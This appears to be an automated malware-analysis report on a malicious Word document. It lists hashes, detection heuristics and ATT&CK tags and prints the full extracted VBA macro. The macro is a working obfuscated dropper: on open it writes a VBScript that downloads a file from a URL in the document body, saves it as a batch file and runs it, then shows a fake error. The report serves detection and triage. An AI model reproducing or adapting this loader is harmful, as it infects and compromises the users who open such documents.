Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d66c2a0d9f78a9af…

MALICIOUS

Office (OOXML)

Size: 22.6 KB
Created: 2016-11-01 17:08:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2017-03-23
MD5: 360f878799f95b9d095676060145252e
SHA-1: 89da9c9a6dcc0ba63b4ec925ea71db2f518dbcc0
SHA-256: d66c2a0d9f78a9af479e2a9ed3cab8b68b12eb35e49cf3ec30e4f2e58ef95d54
Risk Score: 350

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is an OOXML document containing obfuscated VBA macros. The AutoOpen macro triggers a call to `chesgrapqwjj`, which passes its argument to the Shell function to execute a command. The `eemxcqqnfbpq` function builds the download URL from text it finds in the document body (a wildcard Find for `http*\` on ActiveDocument.Content, with the trailing characters trimmed), and the presence of `C:\Users\Romeo\Desktop\First T\Server.exe\` in the document body suggests a local path for a dropped executable. ClamAV detections further confirm its malicious nature as a dropper.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-5632684-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-5632684-0
  • VBA project inside OOXML [medium, 5 related findings] OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script:
      Public Sub chesgrapqwjj(rhkcbhpsnpu)
      Shell rhkcbhpsnpu, 1
      End Sub
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
      Public Sub chesgrapqwjj(rhkcbhpsnpu)
      Shell rhkcbhpsnpu, 1
      End Sub
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script (truncated in the report):
      vtpgbxtwip = bhcdafbcvard(vtpgbxtwip & rfoepugurhqv & ",BSL79 false: a.send(): BSL79SBSL79etBSL79 b = CO(" & rfoepugurhqv & "A/*/D/*/O/*BSL79/BSL79D/*BSL79/B/*/./*BSL79/SBSL79/BSL79*/t/*/r/BSL79*BSL79/e/*BSL79/BSL79am" & rfoepugurhqv & "): bBSL79.BSL79OBSL79peBSL79n:BSL79 b.TyBSL79pe = 1 :BSL79 BSL79b.Write a.BSL79ResponBSL79seBSL79BoBSL79dy: bBSL79.Position = 0  BSL79 BSL79: Set c = CBSL79O(" & rfoepugurhqv & "S/*BSL79/c/*/ripBSL79tingBSL79/*BSL79/./BSL79*/F/BSL79*BSL79/i/*/BSL79l/BSL79*/e/BSL7 …
      & "): If c.FileeBSL79xists(BSL79eBSL79) Then c.BSL79DeleteFile e: EBSL79nd IBSL79f:BSL79 bBSL79.sBSL79aveTBSL79oFBSL79ileBSL79 eBSL79: b.BSL79Close: BSL79Dim dBSL79:BSL79 BSL79SeBSL79t dBSL79 = CO(" & rfoepugurhqv & "W/*/S/*/c/*/BSL79r/BSL79*BSL79/i/*/p/BSL79*BSL79/BSL79t/*/./*/S/BSL79*/h/BSL79*/e/*/ll" & rfoepugurhqv & "): d.Run(eBSL79): Function co(Name) : set co = CreateObject(BSL79g(NaBSL79mBSL79eBSL79)BSL79)BSL79: EBSL79Nd BSL79funcBSL79tioBSL79nBSL79: FunctiBSL79onBSL79 BSL79g(BSL79f): gBS …
      Print #2, vtpgbxtwip
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
      Attribute VB_Customizable = True
      Public Sub AutoOpen()
      CommandButton1_Click
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All of the following URLs were found in document text (OOXML body / shared strings):
      • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
      • http://schemas.openxmlformats.org/markup-compatibility/2006
      • http://schemas.openxmlformats.org/officeDocument/2006/relationships
      • http://schemas.openxmlformats.org/officeDocument/2006/math
      • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
      • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
      • http://schemas.openxmlformats.org/wordprocessingml/2006/main
      • http://schemas.microsoft.com/office/word/2010/wordml
      • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
      • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
      • http://schemas.microsoft.com/office/word/2006/wordml
      • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 7942 bytes
SHA-256: 4f0f3dce1995ecaf82c70ffb1d567dc02818dc1187fd78d12183d1b51791d8f0
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub AutoOpen()
CommandButton1_Click
End Sub
Private Sub ooxtvusmkc()
Dim poplklbcpx
Dim mvkxguobms
Dim flhpkwleqm
Dim kumlbjigni
Dim kumlbjigni, kumlbjigni1
Dim hrpjjvomgs
Dim hrpjjvomgs, hrpjjvomgs1
flhpkwleqm = flhpkwleqm + 821
kumlbjigni1 = kumlbjigni1 * 882
hrpjjvomgs = flhpkwleqm + 822
mvkxguobms = mvkxguobms * 29

End Sub '

Public Sub chesgrapqwjj(rhkcbhpsnpu)
Shell rhkcbhpsnpu, 1
End Sub
Private Sub gnngvfkvuk()
Dim igttgdchfq
Dim bbgdaotqxi
Dim tcrwnbsqip
Dim aivfthpmdj
Dim vdhkmddetr
Dim vdhkmddetr, vdhkmddetr1
vdhkmddetr = bbgdaotqxi + 923
tcrwnbsqip = vdhkmddetr1 * 134
igttgdchfq = vdhkmddetr + 593
bbgdaotqxi = vdhkmddetr * 812

End Sub '

Function eemxcqqnfbpq() As String
Dim dwqqtglovec As Range
    Dim simgnihjuoha As String, jodfmhumvgo As String
Dim nwbkxwpaosdp As String
    simgnihjuoha = bhcdafbcvard("http")
    jodfmhumvgo = "\"
    Set dwqqtglovec = ActiveDocument.Content
    dwqqtglovec.Find.ClearFormatting
    dwqqtglovec.Find.Replacement.ClearFormatting
    With dwqqtglovec.Find
        .Text = simgnihjuoha & "*" & jodfmhumvgo
        .Replacement.Text = ""
        .Forward = True
        .Wrap = wdFindStop
        .Format = False
        .MatchWholeWord = False
        .MatchWildcards = True

        .MatchAllWordForms = False '
    End With

    dwqqtglovec.Find.Execute
   nwbkxwpaosdp = dwqqtglovec.Text
     nwbkxwpaosdp = Left(nwbkxwpaosdp, Len(nwbkxwpaosdp) - 2)
   eemxcqqnfbpq = Trim(nwbkxwpaosdp)
    
  
End Function
Private Sub vapchhrxli()
Dim iegvklenvt
Dim uinksxbkrr
Dim voopxduelh
Dim boeodsdrci
Dim nfbtjpcnbc
Dim xpksnvsgsf
Dim swmlvgrnvw
Dim eoaiftxlch
Dim frutthmxwf
Dim hwlvonoqpx
Dim hwlvonoqpx, hwlvonoqpx1
Dim qrceftjdls
Dim jgfcqodhua
xpksnvsgsf = eoaiftxlch + 354
eoaiftxlch = frutthmxwf * 798
hwlvonoqpx = boeodsdrci + 342
boeodsdrci = swmlvgrnvw * 893
hwlvonoqpx1 = hwlvonoqpx + 283
uinksxbkrr = iegvklenvt * 62
hwlvonoqpx1 = hwlvonoqpx + 326
swmlvgrnvw = hwlvonoqpx * 357
voopxduelh = iegvklenvt + 580
nfbtjpcnbc = iegvklenvt * 769
eoaiftxlch = qrceftjdls + 931
hwlvonoqpx1 = qrceftjdls * 894
jgfcqodhua = qrceftjdls + 711
frutthmxwf = hwlvonoqpx * 742
iegvklenvt = hwlvonoqpx1 + 63
xpksnvsgsf = swmlvgrnvw * 260
swmlvgrnvw = voopxduelh + 661
iegvklenvt = nfbtjpcnbc * 920

End Sub '


Function rfoepugurhqv()
rfoepugurhqv = """"
End Function
Private Sub cphmsjfcwsu()
Dim tanllxwlrp
Dim tanllxwlrp, tanllxwlrp1
Dim wonmjpedps
Dim wonmjpedps, wonmjpedps1
Dim omdfrxcqdr
Dim fikxtoobwq
Dim fikxtoobwq, fikxtoobwq1
Dim tssxkavqps
wonmjpedps1 = tssxkavqps + 378
tanllxwlrp = omdfrxcqdr * 528
omdfrxcqdr = tssxkavqps + 654
tssxkavqps = omdfrxcqdr * 339
omdfrxcqdr = fikxtoobwq + 190
wonmjpedps1 = fikxtoobwq * 979
fikxtoobwq1 = tanllxwlrp + 205
fikxtoobwq = omdfrxcqdr * 524
tssxkavqps = omdfrxcqdr + 203
tanllxwlrp = tanllxwlrp1 * 285
fikxtoobwq1 = fikxtoobwq1 + 538
fikxtoobwq1 = omdfrxcqdr * 351
tanllxwlrp1 = tssxkavqps + 846
tanllxwlrp1 = omdfrxcqdr * 34
tanllxwlrp = tssxkavqps + 498
tssxkavqps = tssxkavqps * 69
tanllxwlrp1 = wonmjpedps + 247
tanllxwlrp1 = wonmjpedps1 * 569
omdfrxcqdr = wonmjpedps1 + 337
tanllxwlrp1 = fikxtoobwq1 * 230
tssxkavqps = tanllxwlrp + 930
wonmjpedps1 = omdfrxcqdr * 425
omdfrxcqdr = wonmjpedps + 785
omdfrxcqdr = fikxtoobwq1 * 602
tanllxwlrp1 = omdfrxcqdr + 716
fikxtoobwq1 = fikxtoobwq1 * 104
omdfrxcqdr = fikxtoobwq + 875
fikxtoobwq1 = fikxtoobwq * 831
omdfrxcqdr = tssxkavqps + 531
tssxkavqps = tanllxwlrp1 * 260

End Sub '




Private Sub CommandButton1_Click()

Dim imlvfpolkfli, vtpgbxtwip

imlvfpolkfli = bhcdafbcvard("wardxs.vbs")
Open imlvfpolkfli For Output As #2
vtpgbxtwip = bhcdafbcvard("eBSL79 = g(" & rfoepugurhqv & "eBSL79rror/*BSL79/BSL79.BSL79/*/bat" & rfoepugurhqv & "BSL79)BSL79: SeBSL79t BSL79a = CO(" & rfoepugurhqv & "M/BSL79*/BSL79S/*/BSL79X/BSL79*BSL79/M/*/BSL79L/*BSL79/2/*/BSL79.BSL79S/*/er/*/BSL79ve/*/rBSL79/*/XM/*/LBSL79H/BSL79*/TBSL79T/*/P" & rfoepugurhqv & "):BSL79 BSL79a.BSL79oBSL79pBSL79en gBSL79(" & rfoepugurhqv & "GBSL79/*/E/*/T/*/" & rfoepugurhqv & ")BSL79, " & rfoepugurhqv)
vtpgbxtwip = vtpgbxtwip & eemxcqqnfbpq
vtpgbxtwip = bhcdafbcvard(vtpgbxtwip & rfoepugurhqv & ",BSL79 false: a.send(): BSL79SBSL79etBSL79 b = CO(" & rfoepugurhqv & "A/*/D/*/O/*BSL79/BSL79D/*BSL79/B/*/./*BSL79/SBSL79/BSL79*/t/*/r/BSL79*BSL79/e/*BSL79/BSL79am" & rfoepugurhqv & "): bBSL79.BSL79OBSL79peBSL79n:BSL79 b.TyBSL79pe = 1 :BSL79 BSL79b.Write a.BSL79ResponBSL79seBSL79BoBSL79dy: bBSL79.Position = 0  BSL79 BSL79: Set c = CBSL79O(" & rfoepugurhqv & "S/*BSL79/c/*/ripBSL79tingBSL79/*BSL79/./BSL79*/F/BSL79*BSL79/i/*/BSL79l/BSL79*/e/BSL79*/SBSL79/*/BSL79y/BSL79*/s/*/BSL79t/*/e/*/BSL79m/*/OBSL79/BSL79*/b/*/BSL79j/*/e/*/BSL79ct" & rfoepugurhqv _
& "): If c.FileeBSL79xists(BSL79eBSL79) Then c.BSL79DeleteFile e: EBSL79nd IBSL79f:BSL79 bBSL79.sBSL79aveTBSL79oFBSL79ileBSL79 eBSL79: b.BSL79Close: BSL79Dim dBSL79:BSL79 BSL79SeBSL79t dBSL79 = CO(" & rfoepugurhqv & "W/*/S/*/c/*/BSL79r/BSL79*BSL79/i/*/p/BSL79*BSL79/BSL79t/*/./*/S/BSL79*/h/BSL79*/e/*/ll" & rfoepugurhqv & "): d.Run(eBSL79): Function co(Name) : set co = CreateObject(BSL79g(NaBSL79mBSL79eBSL79)BSL79)BSL79: EBSL79Nd BSL79funcBSL79tioBSL79nBSL79: FunctiBSL79onBSL79 BSL79g(BSL79f): gBSL79 = RBSL79eBSL79place(f," & rfoepugurhqv & "/*/" & rfoepugurhqv & "BSL79," & rfoepugurhqv & "" & rfoepugurhqv & ")BSL79: endBSL79 functBSL79ion")
Print #2, vtpgbxtwip
Close #2
chesgrapqwjj bhcdafbcvard("wscBSL79ript " & rfoepugurhqv & imlvfpolkfli & rfoepugurhqv)
Dim ikgwrnnmgcx As String
ikgwrnnmgcx = bhcdafbcvard("WindBSL79oBSL79ws iwbjkeuselcd")
Dim oapkhaboco As String
Dim iwbjkeuselcd As Integer
oapkhaboco = bhcdafbcvard("Failed loaBSL79dingBSL79 docuBSL79ment")
iwbjkeuselcd = MsgBox(oapkhaboco, 16, ikgwrnnmgcx)

End Sub
Private Sub hhexwvdqqxfb()
Dim rvdeingakv
Dim aoflojnklb
Dim aoflojnklb, aoflojnklb1
Dim clvrxmulfo
aoflojnklb = aoflojnklb1 + 156
aoflojnklb = aoflojnklb * 294
rvdeingakv = rvdeingakv + 794
aoflojnklb = rvdeingakv * 211
aoflojnklb = clvrxmulfo + 138
aoflojnklb1 = clvrxmulfo * 257
rvdeingakv = aoflojnklb + 964
clvrxmulfo = rvdeingakv * 715
aoflojnklb = aoflojnklb1 + 436
aoflojnklb = aoflojnklb1 * 820
clvrxmulfo = clvrxmulfo + 641
rvdeingakv = rvdeingakv * 344
aoflojnklb1 = rvdeingakv + 213
clvrxmulfo = rvdeingakv * 937
rvdeingakv = clvrxmulfo + 505
clvrxmulfo = rvdeingakv * 190
aoflojnklb1 = aoflojnklb1 + 719
rvdeingakv = clvrxmulfo * 495

End Sub '




Function bhcdafbcvard(s As String) As String
bhcdafbcvard = Replace(s, "BSL79", "")
End Function
Private Sub ahxsikroab()
Dim cqtltgoxho
Dim ikugbopwwo
Dim avghgvlmad
Dim uuhbpfaiok
Dim uuhbpfaiok, uuhbpfaiok1
Dim foxioevxih
Dim hbbwdibbbj
Dim vbdusphueq
hbbwdibbbj = foxioevxih + 344
foxioevxih = foxioevxih * 986
hbbwdibbbj = cqtltgoxho + 21
ikugbopwwo = uuhbpfaiok * 746
ikugbopwwo = uuhbpfaiok + 13
cqtltgoxho = hbbwdibbbj * 381
ikugbopwwo = hbbwdibbbj + 275
vbdusphueq = ikugbopwwo * 978
foxioevxih = hbbwdibbbj + 625
vbdusphueq = avghgvlmad * 51
cqtltgoxho = foxioevxih + 322
uuhbpfaiok = uuhbpfaiok * 135
hbbwdibbbj = vbdusphueq + 518
uuhbpfaiok = uuhbpfaiok * 572
uuhbpfaiok1 = foxioevxih + 631
foxioevxih = avghgvlmad * 521
uuhbpfaiok1 = hbbwdibbbj + 844
hbbwdibbbj = vbdusphueq * 782
vbdusphueq = foxioevxih + 680
vbdusphueq = ikugbopwwo * 193
uuhbpfaiok1 = hbbwdibbbj + 34
hbbwdibbbj = avghgvlmad * 614
foxioevxih = cqtltgoxho + 46
vbdusphueq = avghgvlmad * 399
hbbwdibbbj = avghgvlmad + 684
ikugbopwwo = foxioevxih * 319

End Sub '

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 27648 bytes
SHA-256: 68e899bda2219bd133f3d8424a74061f295cf79ec0bcc41cf33aca32fc0b61eb
Detection: ClamAV: Doc.Dropper.Agent-5632684-0
Obfuscation or payload: unlikely